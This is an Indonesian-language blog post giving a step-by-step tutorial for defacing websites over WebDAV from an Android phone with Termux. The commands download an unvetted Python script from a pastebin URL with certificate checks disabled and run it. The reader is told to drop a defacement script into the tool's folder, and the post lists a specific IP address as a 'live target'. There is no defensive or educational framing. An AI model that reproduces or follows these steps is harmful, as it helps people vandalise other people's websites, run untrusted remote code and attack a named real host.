Welcome to my blog

loading...

Webdav with termux [python]

Yo what's up guys kali ini gw akan nunjukin tutorial deface web dengan termux


Cekidot....
Step 1
Instal termux dlu di playstore

Step 2
Ketik command ini
$ apt update && upgrade 
$ apt install python2 
$ pip2 install urllib3 chardet certifi idna requests 
$ apt install openssl curl 
$ pkg install libcurl 
$ ln -s /sdcard 
$ cd sdcard 
$ mkdir webdav 
$ cd webdav 
$ curl -k -O https://pastebin.com/raw/HnVyQPtR 
$ mv HnVyQPtR webdav.py 
$ python2 webdav.py 

Step 3
Taru scrip deface kalian di folder webdav

Using tools nya
$cd sdcard
$cd webdav
$python2 webdav.py

Screenshot:


Thanks to : Androsec1337
Live target : http://83.211.190.83
0 Komentar untuk "Webdav with termux [python]"

Back To Top